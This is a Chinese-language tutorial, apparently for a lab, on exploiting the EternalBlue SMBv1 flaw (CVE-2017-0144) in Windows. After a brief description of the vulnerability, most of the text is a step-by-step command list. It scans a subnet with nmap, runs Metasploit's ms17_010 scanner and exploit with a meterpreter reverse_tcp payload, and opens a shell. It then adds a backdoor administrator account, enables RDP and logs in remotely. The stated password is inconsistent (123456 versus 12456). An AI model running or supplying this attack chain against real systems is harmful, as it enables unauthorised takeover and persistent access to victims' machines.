永恒之蓝(EternalBlue)是一个用于利用 Microsoft Windows 操作系统 SMB(服务器消息块)协议中的漏洞的攻击工具。该漏洞的编号是 CVE-2017-0144,是由美国国家安全局(NSA)开发并泄漏的一部分。它影响 Windows 的多个版本,并且可以通过网络远程执行代码,导致严重的安全隐患。以下是关于永恒之蓝漏洞的详细介绍及其利用的步骤。
永恒之蓝漏洞简介
漏洞描述:EternalBlue 利用 SMBv1 的实现中的一个漏洞,允许攻击者在无身份验证的情况下远程执行代码。
影响范围:Windows 7、Windows Server 2008、Windows Server 2012 等多个版本的 Windows 系统都有可能受到影响。
利用后果:攻击者可以完全控制受影响的系统,执行任意代码,安装软件,查看、更改或删除数据,甚至在网络中传播恶意软件(例如 WannaCry 勒索病毒就是利用了这个漏洞)。
全部命令
1. nmap 192.168.119.0/24 扫描局域网内的C段主机
2. msfconsole 启动
3. use scanner/smb/smb_ms17_010 输入这个模块用来检查目标是否存在永恒之蓝漏洞
4. set rhost 《ip》 这个是输入你要用来检查目标的IP 比如的目标ip是 192.168.119.130 那么正确格式就是 set rhost 192.168.119.130
5. run 这个命令是用来启动检查的
6. use exploit/windows/smb/ms17_010_eternalblue 如果目标存在永恒之蓝漏洞,使用利用模块
7. set rhosts 192.168.119.130 同样,需要再次设置目标 IP
8. set payload windows/x64/meterpreter/reverse_tcp 设置可选参数
9. set lhost <你的Kali IP> 设置本地监听地址(你的攻击机 IP)
10. exploit 启动运行利用
11. shell 获取靶机shell
12. chcp 65001 输出乱码就使用chcp 65001因为linux和windows的编码方式不同导致
13. net user bai 123456 /add 提升权限创建新用户 bai是用户名,12456是密码
14. net localgroup administrators bai /add 将用户添加至管理员群组
15. netstat -ano 查看端口的开启情况看看目标有没有开启3389端口
16. 如果没有请 输入exit退出命令行,在meterpreter中输入run post/windows/manage/enable_rdp 开启3389端口
17. 打开一个新终端,输入rdesktop 192.168.119.130 中途会让确认,输入yes确认 选择其他用户 输入我们刚才新加的用户名和密码 bai是用户名12456是密码 登录成功!